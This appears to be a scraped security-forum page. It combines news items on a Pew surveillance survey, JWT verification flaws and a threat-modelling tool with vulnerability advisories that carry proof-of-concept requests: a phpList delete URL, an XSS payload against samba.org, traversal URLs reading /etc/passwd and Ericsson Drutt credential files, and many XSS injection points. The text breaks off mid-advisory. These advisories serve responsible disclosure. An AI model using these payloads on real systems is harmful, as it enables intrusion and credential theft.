Aerosol

Some 30 percent of American adults say they have altered their digital behavior in the wake of Edward Snowden’s NSA spying revelations in order to hide information from the government. In Spring 2013, Snowden, a then NSA contractor working for Booz Allen Hamilton, remotely accessed the NSA’s Ft. Meade networks from a satellite office on Hawaii and stole a massive trove of secret documents detailing the U.S. signals intelligence agency’s extensive surveillance capabilities and spying operations. Nearly two years after the initial release, Snowden, now exiled in Russia, is still publishing new revelatory documents about the NSA and its partner’s activities. The Pew Research Center conducted a survey, seeking to determine the extent to which these revelations have changed the way people communicate and behave online as well as people’s approval of and opinions about surveillance. In all, 87 percent of respondents were aware of the NSA’s spying operations to some extent. Among those, 34 percent had actively changed their online behavior. That group accounted for 30 percent of the entire research sample, which consisted of 475 randomly selected adults. In nearly every scenario tested, younger adults were more likely to have disapproved of spying and made changes in light of the revelations. Men were more likely to have heard more about surveillance than woman and college graduates more likely than people with only a high school diploma or less. In general, the more informed the respondent was about government surveillance, the more likely that person was to either disapprove of spying or change online behavior because of it. Specifically, 17 percent of respondents changed the privacy settings on their social media accounts, 15 percent reported to use social media less often, 15 percent said they’ve avoided certain mobile applications and 13 percent have uninstalled apps. In addition, 14 percent claimed they speak more in person instead of communicating online or via phone and 13 percent have avoided using certain terms in online communications. Anecdotally, many respondents reported self-censoring themselves online to avoid communicating about or searching for information that could be deemed threatening, even when such searches were merely out of curiosity and such conversations were in jest. Numerically speaking, 18 percent claim to have changed the way they send emails, 17 percent reported changes in search behavior, 15 percent said they changed social networking tendencies and 15 percent say they are using their cell phones differently. A quarter of those who were aware of NSA surveillance reported having deployed more complicated passwords as a result. More than half of those surveyed, 57 percent to be exact, say it is “unacceptable” for the government to monitor the communications of U.S. citizens. Not surprisingly if you’ve been following the revelations, Americans are comfortable with their government targeting foreigners for surveillance, but not themselves. However, most respondents said they are losing confidence that the public interest is being served by surveillance programs. The public is evenly split about the capacity of the judicial system to balance privacy rights with intelligence needs. Specifically, 82 percent believe it is acceptable to monitor communications of suspected terrorists, 60 percent believe it is acceptable to monitor the communications of American leaders, another 60 percent think it is okay to monitor the communications of foreign leaders, 54 percent say it is acceptable to monitor communications from foreign citizens and only 40 percent fell it is okay for the government to monitor ordinary U.S. citizens. Respondents were more accepting of surveillance when they were asked about its use in specific scenarios such as monitoring people who have visited sites containing child pornography or anti-American sentiments, those who had communicated with”an imam who preached against infidels,” those who used search engines to research weapons and explosives, made unusual banking withdrawals, used encryption to hide files and people who follow others on social media who say hateful things about American leaders. Just 10 percent of respondents say they have used an alternative search engine that does not track search history. Only five percent have added privacy-enhancing browser plug-ins. Four percent have adopted mobile encryption for calls and text messages, three percent have used proxy servers can help them avoid surveillance, two percent have adopted email encryption programs such as Pretty Good Privacy (PGP), two percent have used anonymity software such as Tor and only one percent have used locally-networked communications such as FireChat. These low adoption rates may well relate to another finding stating that more than half of respondents believe it would be too difficult to increase their security and privacy online. 53 percent have not adopted or considered using a search engine that doesn’t keep track of a user’s search history and another 13 percent said they don’t even know about these tools. 46 percent have not adopted or considered using email encryption programs and another 31 percent said they didn’t know such things existed. 43 percent have not adopted or considered adding privacy-enhancing browser plug-ins while 31 percent did not know about these plug-ins. 41 percent haven’t adopted or considered using proxies with an additional 33 percent having no awareness of them. And 40 percent have not adopted or considered using anonymity software such as Tor while another 39 percent don’t even know about Tor. Source

Critical vulnerabilities exist in several JSON Web Token (JWT) libraries – namely the JavaScript and PHP versions – that could let an attacker bypass the verification step. Tim McLean, a Canadian security researcher who specializes in cryptography and dug up the issues, points out that attackers could exploit one of those vulnerabilities, which abuses an asymmetric signing algorithm, in some JWT libraries. Introduced a few years back, JWT is a standard that produces tokens between two parties. For example, a server can produce an admin token, transferred in JSON, signed by the server’s key. Clients can go on to use that token to verify the user is logged in as an admin. The issue revolves around a public key confusion between systems signed with the hash function HMAC and those signed with RSA. “If a server is expecting a token signed with RSA, but actually receives a token signed with HMAC, it will think the public key is actually an HMAC key,” McLean explained in a blog post Tuesday. “How is this a disaster? HMAC secret keys are supposed to be kept private, while private keys are well, public.” In this scenario if an attacker got access to a public key, through an API in some JWT libraries, they could use it as a token and the server would accept it. McLean advises anyone who runs a JWT implementation to verify that tokens with different signatures are set up to be rejected either via a whitelisting or blacklisting mechanism. “The server should already know what algorithm it uses to sign tokens, and it’s not safe to allow attackers to provide this value.” A separate issue, since fixed in many JWT libraries, previously let attackers choose the way tokens are verified, a condition that had “disastrous implications for some implementations,” according to McLean. McLean initially blogged about the issue in February and elaborated further on the issue this week. OAuth, one of the more popular standards for authorization, found his research so important, it republished the work on its own blog yesterday. This issue is rooted in the way that some libraries handled an algorithm known as “none.” Tokens signed with “none” could have be acknowledged as valid tokens with valid signatures, according to McLean. Attackers could modify tokens and sign them with “none” instead of HMAC-SHA256, or HS256. The tokens would then appear “signed.” Attackers then could have gone on to attach their own payload to gain arbitrary account access on some systems. According to McLean most libraries have fixed the “none” issue by ensuring that token verification fails any tokens that use the “none” algorithm. In order to fix the asymmetric keys issue, McLean, with the help of Auth0 got in touch with several of the library’s authors to make sure that any tokens with a different signature type are rejected by their libraries. Since JWTs can work across several languages, .NET, Node.js, Python, PHP, Java, Ruby, to name a few, there were a handful of libraries to contact about the vulnerability. Auth0 fixed the issue in its Node.js library last Thursday and is encouraging users to upgrade to 4.2.2, the latest version. Jose Padilla, who maintains the Python build of the library, fixed the signature verification vulnerability in version 1.0.0 last month by adding support for an alg whitelist. The most recent version, 1.0.1, also includes the fix. According to jwt.io, a service run by Auth0, the PHP or JavaScript versions of the libraries remain vulnerable. Auth0 instructing those who run those versions of JWT to seek out another non-vulnerable library until the issues are fixed or verified. Source

Threat models help application developers answer some fundamental questions about potential risks and how to cut off vulnerabilities before they’re put into production. Some software development lifecycles, however, don’t include threat modeling as part of the code-building process because they’ve either never heard of it, or the process is too difficult. Students at St. Mary’s University in Nova Scotia, Canada, participating in Mozilla’s Winter of Security 2014 project, built a browser-based threat modeling tool that simplifies visualization of systems and data flows, and where soft spots might be introduced during design. The tool, called Seasponge, has been made available on Github and its developers are hoping to not only get feedback and feature suggestions, but also hope to encourage developers to introduce threat modeling into SDLs in order to fix bugs while in design when it’s cheap to do so. “We hope now that it’s out there that people collaborate, build threats for it, collaborate and share files and grow a threat modeling community around Seasponge,” said Glavin Wiechert, one of the students behind the tool along with Joel Kuntz, Sarah MacDonald and Mathew Kallada. “We hope this tool is easy to start out with and will ultimately accelerate the usage of threat modeling and the number of people using threat modeling for projects.” Wiechert, a full-time student at St. Mary’s who also runs his own analytics company, came into this project without much of a security background, other than an interest in the discipline. He and his colleagues, as well as Mozilla, hope that Seasponge ultimately has a place alongside Microsoft’s free SDL threat modeling tool, the most popular tool among developers today. “The original idea came from Mozilla to have a tool like this,” Wiechert said. “There was a heavy demand from their users within Mozilla to use something like the Microsoft threat modeling tool, but have it be more open source and Web-based, and not be forced to be just on the Windows platform.” Being a Web-based alternative to the Microsoft tool, the developers hope that with it now being open source, contributions can be made to help them reach their goals of adding more collaboration features, cloud-based storage for projects, encapsulation of entire systems, and more. “One of the big eye openers for me was the lack of development in terms of the only competition was the Microsoft tool,” Wiechert said. “No one dove into a web platform for threat modeling. I wasn’t very experienced in the field, but it is an important one. I expected more competition and a community, and we hoped to be part of it, but it was really Microsoft-centric.” Wiechert said Mozilla is among the early beta testers and is putting Seasponge through its paces. “It’s functional and you can make new threats in the tool, open, download and save files, visualize them; all the attributes work,” he said. “It’s also functional from a visualization standpoint. I’m hoping Mozilla is using it right now and soon anyone else in the community. We’re hoping to get feedback from the threat modeling community and we’re interested to hear any ideas.” Source

Respect @wildchild te bagi bre? doar 100 lei, nu dai tu 100 lei la fata?

)) Dedicatie cu al mai al dracu' respect. iubitul lu' polonic disliked this post. @askvrit casa de piatra mosule.

@robertutzu tocmai am dat eu link-ul.

# Affected software: phplist # Type of vulnerability: insecure object reference # URL:phplist.com # Discovered by: Provensec # Website: http://www.provensec.com #version: phpList ltd. - v3.0.10 # Proof of concept insecure object refrenced on page deltetation vuln param:delete example: http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99 ref: https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29 Source

###################################################################### # Exploit Title: Samba.org and OpenLDAP.org Reflected XSS # Date: 02/04/2015 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.samba.org & www.openldap.org # Version: / # Category: Reflected Cross Site Scripting # Google dork: # Tested on: Samba.org and OpenLDAP.org main domains ###################################################################### Samba description : ====================================================================== Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell. Samba provides file and print services for various Windows clients and can integrate with a Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Windows NT domains. www.samba.org is the main domain of the project. OpenLDAP description : ====================================================================== OpenLDAP is a free, open source implementation of the Lightweight Directory Access Protocol (LDAP) developed by the OpenLDAP Project. It is released under its own BSD-style license called the OpenLDAP Public License. www.openldap.org is the main domain of the project. JitterBug project description : ====================================================================== JitterBug is a web based bug tracking system. It was originally developed by the Andrew Tridgell to handle bug tracking, problem reports and queries from Samba users. It is now available under the GNU General Public License in the hope that it will be useful for other projects. JitterBug operates by receiving bug reports via email or a web form. Authenticated users can then reply to the message, move it between different categories or add notes to it. In some ways JitterBug is like a communal web based email system. This web page is itself a JitterBug page. You can get an idea of what JitterBug can do by playing with the various links and buttons. JitterBug was used by many others open-source projects like Gnome, rsync, The Gimp, linux-patches, ProFTPD, Willows, Java Linux, WindowMaker, mod_ssl, GnuCash or OpenLdap. Only OpenLDAP and Samba use it currently, so they are both impacted by the vulnerability describes here. RXSS Vulnerability description - PoC : ====================================================================== A reflected XSS is available in the JitterBug bug tracking project provided on the samba.org and openldap.org websites. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Samba/OpenLDAP portals, or capture Samba's (OpenLDAP) users credentials such cookies. It's also possible to forge a fake page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "id" variable and is not properly sanitized before being used to his page. Tested on Firefox 35.0. PoC: http://www.samba.org/cgi-bin/jitterbug/CVS?id=1337</TITLE><img src=x onerror="alert(/Reflected XSS - Yann CAM @asafety/)" /><TITLE>;selectid=1337 JitterBug future : ====================================================================== As indicated by Samba : The JitterBug project is no longer being actively maintained. Jitterbug has known unfixed security vulnerabilities. Unless you know exactly what you are doing, you should not use it any more. If you wish to take over as the maintainer then please contact Andrew Tridgell at [email]jitterbug@tridgell.net[/email] A possible patch is to sanitize each call of the jitterbug.c file : void print_title(char *fmt, ...) Which injects GET vars directly in HTML source generated : print_title('%s - %s/%s', lp_title(), directory, cgi_variable('id')); In the cgi.c file, there is a potential function to escape all dangerous chars : char *urlquote(char *s) Screenshots : ====================================================================== - [url]http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_001.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_002.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_001.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_002.png[/url] Solution: ====================================================================== Fixed by OpenLDAP team (no details) JitterBug is no longer maintained on Samba website. Thanks to both team, Samba and OpenLDAP, for their kindness and responsiveness. Additional resources : ====================================================================== - [url]https://www.samba.org/jitterbug/[/url] - [url]http://www.openldap.org/its/index.cgi/Web?id=7988[/url] - [url]https://bugzilla.samba.org/show_bug.cgi?id=10967[/url] - [url]http://www.asafety.fr/vuln-exploit-poc/contribution-reflected-xss-vulnerabilites-dans-samba-org-et-openldap-org[/url] - [url]http://www.synetis.com[/url] Report timeline : ====================================================================== 2014-11-26 : Samba ticket created to alert team with details and PoC. 2014-11-26 : OpenLDAP ticket created to alert team with details and PoC. 2014-11-26 : OpenLDAP fix the vulnerability. 2014-11-27 : Samba response with additional questions. 2015-03-30 : New comment to get a status 2015-03-30 : JitterBug on Samba.org website is disabled and the project is no more longer maintained. 2015-04-02 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 [url]www.synetis.com[/url] 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: [url]www.synetis.com[/url] | [url]www.asafety.fr[/url] Source

Ce nu ai inteles man? Cateva vulnerabilitati de tip XSS ( Cross Site Scripting ) Open Redirect ( te redirectioneaza spre un link ales de tine, care poate fi un link ce injecteaza un cod malitios etc...)

Ericsson Drutt MSDP (Instance Monitor) Directory Traversal / File Access +------------------------------------------------------------------------------------------------------+ + Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access + +------------------------------------------------------------------------------------------------------+ Affected Product: Ericsson Drutt MSDP (Instance Monitor) Vendor Homepage : www.ericsson.com Version : 4, 5 and 6 CVE v2 Vector : AV:N/AC:L/Au:N/C:P/I:N/A:N CVE : CVE-2015-2166 Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] Patched : Yes +-------------+ + Description + +-------------+ Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system. +----------------------+ + Exploitation Details + +----------------------+ This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s): http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties +---------------------+ + Disclosure Timeline + +---------------------+ 17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback 24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office 24.Feb.2015 - Contacted Corporate Security Office team 02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel 02.Mar.2015 - Shared vulnerability details 06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches 08.Mar.2015 - Agreed on public disclosure timelines 12.Mar.2015 - Patches released 31.Mar.2015 - Public disclosure Ericsson Drutt MSDP (Report Viewer) Cross Site Scripting +----------------------------------------------------------------------+ + Ericsson Drutt MSDP (Report Viewer) - Cross Site Scripting Injection + +----------------------------------------------------------------------+ Affected Product: Ericsson Drutt MSDP (Report Viewer) Vendor Homepage : www.ericsson.com Version : 4, 5 and 6 CVE v2 Vector : AV:N/AC:M/Au:N/C:N/I:P/A:N CVE : CVE-2015-2165 Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] +-------------+ + Description + +-------------+ Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. The Report Viewer component contains a vulnerability (at multiple user-supplied input points) that could allow an unauthenticated, remote attacker to execute arbitrary code in the user's browser session in the context of the affected site. +----------------------+ + Exploitation Details + +----------------------+ The vulnerable input points and respective URL paths are listed below: 1. http://<drutt:port>/reports/pages/top-links.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=clicks&sortDirection=desc&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=&atype=[XSS]&atitle=[XSS] 2. http://<drutt:port>/reports/pages/page-summary.jsp?portal=[XSS]&uid=[XSS] 3. http://<drutt:port>/reports/pages/top-useragent-devices.jsp?portal=[XSS] 4. http://<drutt:port>/reports/pages/service-summary.jsp?portal=[XSS]&uid=[XSS] 5. http://<drutt:port>/reports/pages/top-useragent-devices.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=reqs&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 6. http://<drutt:port>/reports/pages/top-interest-areas.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=urs&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 7. http://<drutt:port>/reports/pages/top-message-services.jsp?interval=Y&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=urs&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 8. http://<drutt:port>/reports/pages/user-statistics.jsp?portal=[XSS]&interval=Y&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 9. http://<drutt:port>/reports/pages/message-shortcode-summary.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]& usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=9397[XSS]&uid2=[XSS]&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=XSS 10. http://<drutt:port>/reports/pages/message-providers-summary.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 11. http://<drutt:port>/reports/pages/license-summary.jsp?interval=D&fromDate=2015-02-11&toDate=2015-02-12&fromTime=00&toTime=00&usercategory=&orderBy=ival&sortDirection=desc&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 12. http://<drutt:port>/reports/pages/top-web-pages.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 13. http://<drutt:port>/reports/pages/top-devices.jsp?portal=[XSS]&interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 14. http://<drutt:port>/reports/pages/top-pages.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 15. http://<drutt:port>/reports/pages/useragent-device-summary.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=[XSS]&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 16. http://<drutt:port>/reports/pages/message-services-summary.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 17. http://<drutt:port>/reports/pages/top-message-providers.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 18. http://<drutt:port>/reports/pages/top-message-devices.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 19. http://<drutt:port>/reports/pages/top-message-assets.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 20. http://<drutt:port>/reports/pages/top-message-downloads.jsp?interval=M&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 21. http://<drutt:port>/reports/pages/top-message-shortcode.jsp?interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 22. http://<drutt:port>/reports/pages/request-summary.jsp?interval=D&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=ival&sortDirection=desc&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 23. http://<drutt:port>/reports/pages/link-summary-select.jsp?portal=[XSS] 24. http://<drutt:port>/reports/pages/link-summary.jsp?portal=[XSS]&interval=M&fromDate=2014-02&toDate=2015-02&fromTime=17&toTime=18&usercategory=&orderBy=ival&sortDirection=desc&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 25. http://<drutt:port>/reports/pages/session-summary.jsp?portal=[XSS]&show=a&interval=M&fromDate=2014-02[XSS]&toDate=2015-02[XSS]&fromTime=17[XSS]&toTime=18[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 26. http://<drutt:port>/reports/pages/provider-summary-select.jsp?portal=[XSS] 27. http://<drutt:port>/reports/pages/provider-summary.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 28. http://<drutt:port>/reports/pages/top-providers.jsp?portal=[XSS] 29. http://<drutt:port>/reports/pages/module-summary-select.jsp?portal=[XSS] 30. http://<drutt:port>/reports/pages/module-summary.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&orderBy=[XSS]&sortDirection=[XSS]&uid=[XSS]&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 31. http://<drutt:port>/reports/pages/top-providers.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 32. http://<drutt:port>/reports/pages/top-modules.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] 33. http://<drutt:port>/reports/pages/top-services.jsp?portal=[XSS]&interval=H&fromDate=[XSS]&toDate=[XSS]&fromTime=[XSS]&toTime=[XSS]&usercategory=&top=10&sortOrder=asc&orderBy=[XSS]&sortDirection=[XSS]&uid=&uid2=&kword=[XSS]&uname=[XSS]&pname=[XSS]&sname=[XSS]&file=[XSS]&atype=[XSS]&atitle=[XSS] +---------------------+ + Disclosure Timeline + +---------------------+ 17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback 24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office 24.Feb.2015 - Contacted Corporate Security Office team 02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel 02.Mar.2015 - Shared vulnerability details 06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches 08.Mar.2015 - Agreed on public disclosure timelines 31.Mar.2015 - Public disclosure Ericsson Drutt MSDP (3PI Manager) Cross Site Scripting +p-------------------------------------------------------------------+ + Ericsson Drutt MSDP (3PI Manager) - Cross Site Scripting Injection + +--------------------------------------------------------------------+ Affected Product: Ericsson Drutt MSDP (3PI Manager) Vendor Homepage : www.ericsson.com Version : 4, 5 and 6 CVE v2 Vector : AV:N/AC:M/Au:N/C:N/I:P/A:N CVE : Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] Patched : Yes +-------------+ + Description + +-------------+ Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. The 3PI Manager component contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code in the user's browser session in the context of the affected site. +----------------------+ + Exploitation Details + +----------------------+ The vulnerable input point and respective URL path is listed below: http(s)://<drutt>:<port>/tpim/register.do POST Data: companyName=aaa&contactPersonName=secuid0&contactPersonEmail=[XSS]&contactPersonPhone=aa&comment=&send.pressed=Save +---------------------+ + Disclosure Timeline + +---------------------+ 17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback 24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office 24.Feb.2015 - Contacted Corporate Security Office team 02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel 02.Mar.2015 - Shared vulnerability details 06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches 08.Mar.2015 - Agreed on public disclosure timelines 12.Mar.2015 - Patches released 31.Mar.2015 - Public disclosure Source Ericsson Drutt MSDP (3PI Manager) Open Redirect +------------------------------------------------------+ + Ericsson Drutt MSDP (3PI Manager) - Open Redirection + +------------------------------------------------------+ Affected Product: Ericsson Drutt MSDP (3PI Manager) Vendor Homepage : www.ericsson.com Version : 4, 5 and 6 CVE v2 Vector : AV:N/AC:M/Au:S/C:N/I:P/A:N CVE : CVE-2015-2167 Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] Patched : Yes +-------------+ + Description + +-------------+ Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. The identified vulnerability affects the 3PI Manager component and allows remote attackers to redirect (authenticated) users to arbitrary web sites and conduct phishing attacks via unspecified vectors. +----------------------+ + Exploitation Details + +----------------------+ The vulnerable parameter and the respective URL path is listed below: 